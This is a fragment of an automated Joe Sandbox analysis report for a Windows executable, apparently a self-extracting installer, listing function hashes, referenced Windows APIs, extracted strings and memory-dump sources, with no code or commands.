                                                        • Instruction ID: 594e1fedd3b237b922d306251ac2c633a78c324c1a6b8b35213b93328f48629f
                                                        • Opcode Fuzzy Hash: 0119fbbe3327ba141a7f55d4cd9843eb37e83c3fd0627bc7f4021d3c2ce17c58
                                                        • Instruction Fuzzy Hash: 0B629D22A19A82E6EB14EF26D4881BDB361FB45788FC05132DB6D477D5EF38E544C3A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph: function entry 7ff7f4d82ff0; Windows APIs referenced by the graph nodes: ShellExecuteExW, ShowWindow, GetExitCodeProcess, CloseHandle (rendered graph edge data not reproduced)
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_invalid_parameter_noinfo_noreturn
                                                        • String ID: .exe$.inf$Install$p
                                                        • API String ID: 1054546013-3607691742
                                                        • Opcode ID: 429189c49b1a022ab02d4fccaab96c0e9f1cb398093bee8efb5804c0d3894d76
                                                        • Instruction ID: f8d581690a200f75a802398f44e477b063952fe4b8aa155b50aaedd299c8c596
                                                        • Opcode Fuzzy Hash: 429189c49b1a022ab02d4fccaab96c0e9f1cb398093bee8efb5804c0d3894d76
                                                        • Instruction Fuzzy Hash: 40C16E22B18A0296EB14EF26D99427DB3A1BB85B80F884035DB6D477E5DF3DE45183A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: ButtonChecked$Message$DialogDispatchItemPeekShowTranslateWindow
                                                        • String ID:
                                                        • API String ID: 4119318379-0
                                                        • Opcode ID: 69e24ba9009fcb1a64d7301b465f30633956cb9a0fdcdd683f7332429d64cc7a
                                                        • Instruction ID: 795a19dfe972946075a87b42ad511d76ee2a7724186dc0cfdd8fbdb62ece9544
                                                        • Opcode Fuzzy Hash: 69e24ba9009fcb1a64d7301b465f30633956cb9a0fdcdd683f7332429d64cc7a
                                                        • Instruction Fuzzy Hash: 6541CE35B2464287F720AF62E850BE9B361FB49B98F804135DF2A47BE5CE3DD44587A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: Xinvalid_argumentstd::_
                                                        • String ID: AES-0017$[c^[$map/set too long$z01$zip$zipx$zx01
                                                        • API String ID: 909987262-2988828694
                                                        • Opcode ID: e98891d6ad104e19ab9c5c76874faf8a4a553f04b34342c29c2764dde47c1347
                                                        • Instruction ID: 58e0cdc03f3b26d005e744e07c7091e9a2d27c6bb85a4d0f0cfc4e0b9a17b29c
                                                        • Opcode Fuzzy Hash: e98891d6ad104e19ab9c5c76874faf8a4a553f04b34342c29c2764dde47c1347
                                                        • Instruction Fuzzy Hash: 41B0925890400D82E62CBB82CC9107463209B14740F900C3083288F891093870424256
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
                                                        • String ID:
                                                        • API String ID: 3536497005-0
                                                        • Opcode ID: 39edef82397ba72a43b4f373ecc1f356af9409ce81394d3c0888f0e682ff87ce
                                                        • Instruction ID: 05be47834f1ebd67bad36b1b85039e30d3154b2d872029aa0186ebbefea2a2b1
                                                        • Opcode Fuzzy Hash: 39edef82397ba72a43b4f373ecc1f356af9409ce81394d3c0888f0e682ff87ce
                                                        • Instruction Fuzzy Hash: DB61C366A19B8196E7209F2AE48036EB7A1B7857A8F501334DFBD03AD4CF3DD094C794
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: Time$File$System$Local$SpecificVersion
                                                        • String ID:
                                                        • API String ID: 2092733347-0
                                                        • Opcode ID: e045fec339b82cfcbd76d1d976abdda53ec1060d8e03499549cf22dc3b3cc608
                                                        • Instruction ID: a550c0849e1e13424cf3447d36881a6674753e50f1cc50e2a2ec81ee36e638d4
                                                        • Opcode Fuzzy Hash: e045fec339b82cfcbd76d1d976abdda53ec1060d8e03499549cf22dc3b3cc608
                                                        • Instruction Fuzzy Hash: 1E314962B10A55DAFB00DFB6D8801AC7370FB18758B94503AEF1DA3A98EA38D495C350
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
                                                        • String ID: sfxcmd$sfxpar
                                                        • API String ID: 3540648995-3493335439
                                                        • Opcode ID: 2bc299da20fbec87d704cc9bab44ddf9c5bd5a2a6beedb7dd826ddad9008950f
                                                        • Instruction ID: 099624d814b7de609d3745b46211a90618794e614b8e6c88009325edf43175b0
                                                        • Opcode Fuzzy Hash: 2bc299da20fbec87d704cc9bab44ddf9c5bd5a2a6beedb7dd826ddad9008950f
                                                        • Instruction Fuzzy Hash: 18317262A14A4985EF04AF6AE8C41BCB371FB48B98F840135DF6D17BE5CE38D041C390
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        • LoadBitmapW.USER32 ref: 00007FF7F4D7EB3A
                                                        • GetObjectW.GDI32 ref: 00007FF7F4D7EB6B
                                                        • DeleteObject.GDI32 ref: 00007FF7F4D7EBA5
                                                        • DeleteObject.GDI32 ref: 00007FF7F4D7EBD5
                                                          • Part of subcall function 00007FF7F4D7C220: FindResourceW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00001000,00007FF7F4D844D7), ref: 00007FF7F4D7C239
                                                          • Part of subcall function 00007FF7F4D7C220: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,00001000,00007FF7F4D844D7), ref: 00007FF7F4D7C255
                                                          • Part of subcall function 00007FF7F4D7C220: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,00001000,00007FF7F4D844D7), ref: 00007FF7F4D7C26F
                                                          • Part of subcall function 00007FF7F4D7C220: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,00001000,00007FF7F4D844D7), ref: 00007FF7F4D7C281
                                                          • Part of subcall function 00007FF7F4D7C220: GlobalAlloc.KERNELBASE ref: 00007FF7F4D7C2A2
                                                          • Part of subcall function 00007FF7F4D7C220: GlobalLock.KERNEL32 ref: 00007FF7F4D7C2B7
                                                          • Part of subcall function 00007FF7F4D7C220: GdipCreateHBITMAPFromBitmap.GDIPLUS ref: 00007FF7F4D7C365
                                                          • Part of subcall function 00007FF7F4D7C220: GlobalUnlock.KERNEL32 ref: 00007FF7F4D7C388
                                                          • Part of subcall function 00007FF7F4D7C220: GlobalFree.KERNEL32 ref: 00007FF7F4D7C391
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
                                                        • String ID: ]
                                                        • API String ID: 1428510222-3352871620
                                                        • Opcode ID: 167604b5f0df72b06740ca993f35d2c5df04121dc076d528af12ba987f99282d
                                                        • Instruction ID: d9db3a9e523ee4ba1f674aee276b02047cf0ed43011ce588165d9c20b01e6206
                                                        • Opcode Fuzzy Hash: 167604b5f0df72b06740ca993f35d2c5df04121dc076d528af12ba987f99282d
                                                        • Instruction Fuzzy Hash: 78113D21B1964247EB24BF53E694379F691BF88BC0F980034DB6E47BC5EE2CE80486D0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: Message$DialogDispatchPeekTranslate
                                                        • String ID:
                                                        • API String ID: 1266772231-0
                                                        • Opcode ID: 7cff314f2ed7f30e3d95f64182e7aea28787e66a788d380f9b90687b6d32506f
                                                        • Instruction ID: e0ba10cfe4a95120bc968fafa69db353b3d97abbcd575063ff3574cea374b1a2
                                                        • Opcode Fuzzy Hash: 7cff314f2ed7f30e3d95f64182e7aea28787e66a788d380f9b90687b6d32506f
                                                        • Instruction Fuzzy Hash: 1CF0EC26A3895283EBA0AF22E895BB6B360FFD4705FC05435E75E418D4EF2CD109CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F4D75657
                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F4D7565D
                                                          • Part of subcall function 00007FF7F4D66288: FindClose.KERNELBASE(?,?,?,00007FF7F4D6FF61), ref: 00007FF7F4D662BD
                                                          • Part of subcall function 00007FF7F4D71D98: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7F4D71DED
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo_noreturn$CloseFindswprintf
                                                        • String ID: zip$zipx
                                                        • API String ID: 2713956076-1268445101
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Similarity
                                                        • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                        • String ID: EDIT
                                                        • API String ID: 4243998846-3080729518
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Similarity
                                                        • API ID: FileWrite$Handle
                                                        • String ID:
                                                        • API String ID: 4209713984-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo_noreturn$ItemText
                                                        • String ID:
                                                        • API String ID: 3750147219-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Similarity
                                                        • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 1452418845-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Similarity
                                                        • API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
                                                        • String ID:
                                                        • API String ID: 2359106489-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Similarity
                                                        • API ID: ErrorLast$FileHandleRead
                                                        • String ID:
                                                        • API String ID: 2244327787-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00007FF7F4D66288: FindClose.KERNELBASE(?,?,?,00007FF7F4D6FF61), ref: 00007FF7F4D662BD
                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F4D779A3
                                                        Strings
                                                        Similarity
                                                        • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                                        • String ID: W#b$W?f
                                                        • API String ID: 1011579015-2742597119
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Similarity
                                                        • API ID: DirectoryInitializeMallocSystem
                                                        • String ID: riched20.dll
                                                        • API String ID: 174490985-3360196438
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Similarity
                                                        • API ID: CreateFile$_invalid_parameter_noinfo_noreturn
                                                        • String ID:
                                                        • API String ID: 2272807158-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Similarity
                                                        • API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
                                                        • String ID:
                                                        • API String ID: 2176759853-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Similarity
                                                        • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                        • String ID:
                                                        • API String ID: 1203560049-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
                                                        • String ID:
                                                        • API String ID: 3118131910-0
                                                        • Opcode ID: 24329dc93e2db74fbf3ff938c648f7867179324972ce2d94c87a74dabcd1ca8b
                                                        • Instruction ID: 509b5aa51c8762e68ded3a291c65f27207c2e99d1ba5464164aef71f58ed9c7f
                                                        • Opcode Fuzzy Hash: 24329dc93e2db74fbf3ff938c648f7867179324972ce2d94c87a74dabcd1ca8b
                                                        • Instruction Fuzzy Hash: B721A922A19B85D3FB10AF26F4D516DB361FB84BD4F900234EBAD42AD5DF2CD5818650
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                        • String ID:
                                                        • API String ID: 1203560049-0
                                                        • Opcode ID: b758bb6361ebbd81519e6b315bcc9c417bc2b8f266a69be79ea9ec31804be294
                                                        • Instruction ID: 48c188ca21aac1e369a3b3be7a267edf0108198034de0a3e507a392f3d42251b
                                                        • Opcode Fuzzy Hash: b758bb6361ebbd81519e6b315bcc9c417bc2b8f266a69be79ea9ec31804be294
                                                        • Instruction Fuzzy Hash: 87213722A18A8593FB10AF15F4D4169B361FB89BA4F900231EBBD437D5DF3CD5418750
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: Process$CurrentExitTerminate
                                                        • String ID:
                                                        • API String ID: 1703294689-0
                                                        • Opcode ID: dacd4d28ee892111b3df8d3e8b80cb264a15a7566b0b4340e23d5be73f25a806
                                                        • Instruction ID: 89606d216e9e9134900eca0b4f007ad68a11d38fc3e63d274652f66fb49ce6e7
                                                        • Opcode Fuzzy Hash: dacd4d28ee892111b3df8d3e8b80cb264a15a7566b0b4340e23d5be73f25a806
                                                        • Instruction Fuzzy Hash: 79E01224B0430E83EB04BF26DCC16797352BF44B41F85543DCA2E423D6DE3DA44982E0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                        • String ID: vector too long
                                                        • API String ID: 3668304517-2873823879
                                                        • Opcode ID: 773ab534bfc342007c3e699b05ec78ac80692e862ae6a78e638b037e1d5712e3
                                                        • Instruction ID: dd87c92bd2b7c84343c88244bdebf294bffd8e7dcc57e0a3f8c4b7733d165cbe
                                                        • Opcode Fuzzy Hash: 773ab534bfc342007c3e699b05ec78ac80692e862ae6a78e638b037e1d5712e3
                                                        • Instruction Fuzzy Hash: A761A072A29B8187E700AF62E8C02ADB7A4FB84754F505235EBA907BD5DF3CD490C790
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                        • String ID:
                                                        • API String ID: 3668304517-0
                                                        • Opcode ID: 87fcb866617abeeb89e036a0e954f0777316bb9ab082f512a64afd7ce57831e1
                                                        • Instruction ID: d794b7b2fb11e39a1e40cf40b4015007fa0ab09aeab5b6a6f344bfef5b2f6990
                                                        • Opcode Fuzzy Hash: 87fcb866617abeeb89e036a0e954f0777316bb9ab082f512a64afd7ce57831e1
                                                        • Instruction Fuzzy Hash: D4717162B25A4686FF10AF66D4C42ACB366BB44BA4F804136DB3D177D5EE3CE441C3A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
